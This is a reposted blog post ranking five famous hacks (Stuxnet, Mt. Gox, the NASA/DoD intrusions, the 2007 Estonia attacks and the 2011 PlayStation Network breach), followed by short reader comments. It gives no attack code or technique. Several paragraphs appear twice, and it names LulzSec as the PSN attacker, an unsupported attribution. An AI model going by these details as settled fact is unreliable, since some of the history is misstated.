 | |
©techtechnik.com
|
BEST FIVE BIGGEST HACK IN HISTORY
Hacking and hackers are
the stuff of mythology, film, and often breathless headlines. From the attacks
that brought down Mastercard and Visa's websites in 2010 to the Xbox Live and
PlayStation outages of Christmas 2014, it sometimes feels like our systems are
under permanent assault from those who would take them offline.
And yet, none of these are true hacks - most
simply involve overloading websites with requests until they cease to function.
 | |
| ©alphr.com |
Hacking, as first demonstrated in 1903 by magician John Nevil Maskelyne when he hijacked a public demonstration of Marconi's telegraph, involves gaining unauthorised access to a computer or IT system and requires some skill.
While small-scale attacks, malware and botnets
still do the rounds, large-scale disruptive hacks are rare. When they do
happen, though, they can be spectacular.
Here we clear out the DDoS dross and minor acts
of cyberhooliganism to bring you the five biggest hacks of all time.
#5
Stuxnet
The virus that destroyed nuclear equipment
 |
| ©buzzfeed.com |
Stuxnet is one of the best known names when it comes to cyber
attacks, and for good reason. The worm (a self replicating, self propagating
computer virus) destroyed a fifth of Iran's nuclear centrifuges in 2009,
seriously hindering the country's atomic plans.
But what makes Stuxnet really stand out among
all the destructive malware out there was just how well crafted it was.
According
to Trend Micro, the Stuxnet payload consisted of three parts:
the worm itself (WORM_STUXNET), an execution .LNK file (LNK_STUXNET) that
allowed the worm to auto-execute, and a rootkit (RTKT_STUXNET) that hid the
worm's existence.
It
was also propagated by an unusual means. For four years, it was thought the
virus was introduced into the Natanz uranium enrichment facility, the primary
target of the attack about 1,000 centrifuges were damaged, via an infected USB
stick. However, researchers at Kaspersky Lab discovered in 2014 that the vector of
attack was in fact the plant's supply chain.
Five organisations
supplying Natanz were the initial victims of Stuxnet, including a company named
NEDA, the lead supplier of the Siemens centrifuges that were the ultimate
target of the worm. It's now thought that these organisations, and NEDA in
particular, were the real vector of infection.
So why wasn't the worm detected at this initial
point of infection? The answer lies in what Stuxnet did.
As
Ralph Langner, one of the first people to decode the worm, described it, to
describe it in an interview with the New York Times,
Stuxnet was "a marksman's job". Unless you were running a uranium
enrichment facility, it lay dormant, with the rootkit hiding its presence.
There was no way for the Stuxnet Typhoid Marys to know they were being used by
the attackers.
Speaking of whom, this leads us to the last
question - whodunnit?
The sophistication of the Stuxnet program led
many to believe it was created by a nation state and, given the target, that
the US and Israel were probably involved.
Cables
obtained by Wikileaks that were republished by The Guardian showed
the US "was advised to adopt a policy of 'covert sabotage' of Iran's
clandestine nuclear facilities, including computer hacking and 'unexplained
explosions', by an influential German thinktank". The same thinktank
informed US officials in Germany that this kind of undercover operation
"would be 'more effective than a military strike' in curtailing Iran's
nuclear ambitions".
Suspicions
of the US' involvement were bolstered by documents leaked to New York Times journalist
David Sanger.
In the end, the only reason we even know of
Stuxnet's existence is thanks to a botched software update that led to the worm
escaping into the wild, where security experts were able to analyse it.
Sanger's sources told him this led to panic in
the newly installed Obama administration for precisely the reason that analysts
would be able to dissect the virus and determine its creators. Vice President
Joe Biden allegedly blamed the incident on the Israelis, which all but
confirmed the two countries collaborated on the virus.
#4
Mt. Gox hack
 | |
| ©nbcnews.com |
How can millions of dollars disappear without
trace? This is the question Mt. Gox, the largest Bitcoin exchange in the world,
was faced with in early 2014.
On 7 February, the exchange suddenly ceased trading, saying it had
discovered a "transaction malleability" bug and locked customers out
of their accounts. The organisation would later blame hackers for stealing $460
million-worth of Bitcoins over the course of three-to-four years, causing a
crash in the value of the cryptocurrency.
Hacking,
Distributed has done a good rundown of all the
explanations given for what happened in 2014 - which may ultimately have been
fraud or negligence, according to two lawsuits.
While this crisis led to the eventual bankruptcy of Mt. Gox, there was an
earlier hack that foreshadowed what was to come in 2014.
On 13 June 2011, 478 Mt. Gox accounts were robbed of a total of 25,000 bitcoins (worth between
$375,000 and $500,000 at the time), which were all transferred into a single
account.
Mt. Gox largely blamed the victims for
the theft, as the perpetrator had apparently used valid account passwords to
gain access and carry out the transaction.
"As a reminder we assume no responsibility should your funds be stolen by someone using your own password," said Mt. Gox CEO Mark Karpeles, using the alias MagicalTux.
However, the 25,000 bitcoin theft was just the
beginning. Towards the end of the same week, it became apparent the reason the
478 accounts were compromised using their own passwords was because a hacker
had managed to access the Mt. Gox database and steal the usernames and
passwords of all 60,000+ customers.
Karpeles seemed initially quite relaxed about
claims the entire Mt. Gox database had been compromised, saying :
"Passwords are encrypted one way (+salt). Someone cannot be selling 'user
+ pass' unless he has some way to revert this."
By 20 June, though, he was taking things
a bit more seriously, when a huge Bitcoin sale from one of the compromised
accounts caused the value of the cryptocurrency to crash to near zero.
In an official announcement on the Mt. Gox site, Karpeles explained that an admin account had been compromised and the attacker responsible had used the associated permissions to "arbitrarily assign himself a large number of bitcoins, which he subsequently sold on the exchange".
In an official announcement on the Mt. Gox site, Karpeles explained that an admin account had been compromised and the attacker responsible had used the associated permissions to "arbitrarily assign himself a large number of bitcoins, which he subsequently sold on the exchange".
In doing this, the hacker flooded Mt. Gox with more
bitcoins than were actually in the exchange's wallet, bringing the value of the
cryptocurrency crashing down from $17.50/btc to $0.01/btc, while also relieving
another account of 2,000 bitcoins.
In the same statement, Karpeles also confirmed the
loss of the Mt. Gox database, stating this was likely how the hacker gained
access to the admin account that caused the crash and the one that was robbed
of 2,000 bitcoins.
The damage was undone by shutting down the exchange
and rolling back the transactions that had taken place during the attack, while
the lost 2,000 bitcoins were refunded at Mt. Gox's own expense.
What made the attack possible and successful,
though, wasn't just the SQL injection vulnerability in the Mt. Gox code that
gave hacker access to the user database, or the fact that usernames and email
addresses were stored in plain text, or that it used the MD5 hashing algorithm
rather than a more secure SHA-2 alternative, or even that about 1,600 of the
passwords were hashed but unsalted. It was Karpeles' own unique brand of hubris
and naïveté. Failure to take seriously the complaints of the original 478
customers whose accounts were compromised - or even to consider it a bit weird
that nearly 500 people were hacked on the same day - was a serious misstep;
following it up by seemingly not caring that someone had stolen an entire user database
is mind-blowing.
In light of what happened in 2011, Mt. Gox's
complete failure in 2014 was perhaps inevitable.
#3
NASA and the Department of Defense hack
 | |
| ©factwide.com |
In the movies and on TV, when a young hackling
manages to get into military or government computer systems, they are normally
offered a job working for the FBI. The reality is quite different.
At the turn of the millennium, NASA and
the US Department of Defense (DoD) were successfully compromised by two
hackers, 15-year-old Floridian Jonathan
James and 35-year-old Scot Gary McKinnon.
James was the first to have a crack at
the American space agency in 1999, which he crawled into by compromising
computers at the US Defense Threat Reduction Agency.
Among other things, he managed to make off with the source code for the life support systems on the International Space Station (ISS). The Registerreported it cost NASA alone $41,000 to repair the damage he had done.
Among other things, he managed to make off with the source code for the life support systems on the International Space Station (ISS). The Registerreported it cost NASA alone $41,000 to repair the damage he had done.
Gary McKinnon has the dubious honour of being
accused by US prosecutors of perpetrating "the biggest military computer
hack of all time".
According to American authorities, between February
2001 and March 2002 he hacked into 97 computers, 16 belonging to NASA and 81
belonging to other parts of the DoD.
During his actions, which he claims were carried
out in search of evidence of UFOs and the suppression of new energy
technologies, McKinnon managed to paralyse munitions supplies to the US Naval
Fleet in the Atlantic in the immediate aftermath of 9/11 by deleting weapons
logs. He is also alleged to have stolen 950 passwords and dozens of documents
in the course of his actions.
The cost of repairing the damage alleged to have
been caused by McKinnon was in excess of £550,000, the US government claimed.
As the hacks were carried out against the military,
it's not been made public how exactly James and McKinnon gained access to the
systems they did, but we do know what happened to the men in question.
McKinnon fought against extradition to the US for a decade, with Home Secretary Theresa May eventually blocking the motion in October 2012, stating that handing him over to the US raised "such a high risk of him ending his own life" that it would breach his human rights. The director of public prosecutions, Keir Starmer, announced that December that no prosecution would be brought in the UK, as all the evidence was in the US.
James, on the other hand, was convicted in
September 2000 of hacking the DoD and NASA. However, as he was a minor when he
carried out the crimes, he was sentenced to six-months house arrest, probation
until the age of 18, and had to write letters of apology to NASA and the DoD.
#2
Estonian cyber war
 |
| STATUE THAT SPARKED THE CYBER WAR |
Yes, yes, we said we were clearing out the
DDoS dross in the introduction, but what happened
to Estonia in 2007 was no ordinary DDoS attack.
Kicking off at 10pm on 26 April, the Baltic state
suffered three weeks of DDoS attacks, which completely crippled its IT
infrastructure.
The attackers first targeted the website of the ruling Reform Party and, over the course of the first week, went on to take down the sites of most other political parties, the official site of the Estonian Parliament and other government entities.
The attackers first targeted the website of the ruling Reform Party and, over the course of the first week, went on to take down the sites of most other political parties, the official site of the Estonian Parliament and other government entities.
In the second week, the attack spread to the
websites of Estonian news outlets, universities, schools and businesses.
But it was in the third week that the real hammer
blow fell. At the stroke of midnight, Moscow time, on 9 May a huge torrent of
traffic - peaking at over 4 million data packets per second - slammed into
Estonia's banking infrastructure. This was a critical attack for a country that
had pioneered online banking and where, at the time, around 97% of all banking
transactions took place online.
Within 24 hours Hansapank, the country's largest
bank, took the drastic step of shutting off all its internet-based operations.
This not only disrupted online transactions, but also severed the connection
between the bank and its cash machines, rendering them inoperable. Perhaps
worse, Estonians outside of the country suddenly found their debit cards
wouldn't work, as the bank's actions cut it off from the rest of the world.
The attacks eventually subsided on 19 May.
Only one person has ever been charged in relation to what has since been termed the first cyber war, a 20-year-old ethnic Russian Estonian called Dmitri Galushkevich, who was fined the equivalent of £830. However, it's suspected that all the perpetrators were either Russians or ethnic Russian Estonians, partly because security experts subsequently found chats and threads about the attack on Russian-language forums, partly because a significant amount of traffic from the first wave of the attack was traced to Russia, and partly because of timing.
The attack followed two days of rioting in the
Estonian capital Tallinn over the relocation of a bronze war memorial dating
from the Soviet era. Perhaps even more damningly, the third wave of the attack
commenced on the Russian equivalent of VE Day.
Of all the lessons learnt from the Estonian cyber
assault - and there were many - probably the most important was the need to put
as much effort and money into protecting a country's online systems as building
them up. Estonia had earned the reputation of being "the most wired
country in Europe" at the time of the attacks, with the country pouring
vast amounts of money into growing its digital economy, but little into cyber
defences. It was this, rather than dependence on online systems per se, that
was the country's downfall when the botnets came knocking.
#1
PlayStation Network 2011 hack
Sometimes hackers manage to pull of something so
audacious it becomes part of infosec legend: the 2011 LulzSec hack of the
PlayStation Network is one such case.
In mid-April 2011, users trying to log in to the
PlayStation Network (PSN) were greeted with a message stating the system was
"currently undergoing maintenance" or simply that "an error
[had] occurred", preventing them from logging in.
On 20 April, Sony acknowledged there was a problem
with "certain functions of PlayStation Network" and that it would
report back with more information when it was available.
Instead, later that night, Sony shut down the network
completely - an outage that would last a month.
One of the defining features of the early part of
the PSN hack was Sony's reticence to share information with the public. It took
two days for Sony to give any kind of explanation as to why it shut down the
PSN, and what information it did give was brief in the extreme.
A short post to the
PlayStation blog on 22 April from then director of corporate
communications, Patrick Seybold, said simply:
"An external intrusion on our system has affected [the] PlayStation Network and Qriocity (now Sony Music Unlimited) services. In order to conduct a thorough investigation and to verify the smooth and secure operation of our network services going forward, we turned off ... [the] services on the evening of Wednesday, April 20th."
It would be another four days until Sony revealed
the extent of what had happened, and it was huge.
Between 17 and 19 April, LulzSec hackers managed to completely breach Sony's
security measures gaining access to all 77 million users' real names, postal
addresses, country, email address, date of birth, PSN and/or Qriocity username
and password, and security answers.
While this would have been bad enough, it
was compounded by the fact that 12,700 card details, along with billing
addresses and purchase history, were also taken during the hack - although this wasn't confirmed until early May.
This led to Sony advising users not only to change
their PSN password once the service was online again, as well as that of any
other service where they'd used the same username and/or password, but also
"to be especially aware of email, telephone, and postal mail scams".
It also advised customers "to remain vigilant,
to review [their] account statements and to monitor [their] credit
reports" in order to protect against identity theft and financial fraud.
By the time full service was resumed on 31 May, the 2011 PSN hack had cost Sony $171 million and was, by volume, one of the biggest hacks ever at the time.
By the time full service was resumed on 31 May, the 2011 PSN hack had cost Sony $171 million and was, by volume, one of the biggest hacks ever at the time.
Sony has never revealed exact details of how its servers were breached, however it's thought a SQL injection and/or a modded PS3 may have been used. Once inside, the hackers were home free, because most non-financial details were stored in plain text. The only exception was the passwords, which were hashed using MD5, although they were not encrypted.
While Sony has been the victim of subsequent hacks
and attacks - most recently the Christmas 2014 DDoS of the PSN and November
hacking of Sony Pictures Entertainment - spring 2011 stands out as a beacon of
poor crisis management and data security that won't be forgotten anytime soon.
info source @ www.alphr.com
Very Interesting post
ReplyDeleteGood one...
This comment has been removed by the author.
ReplyDeleteNice������
ReplyDelete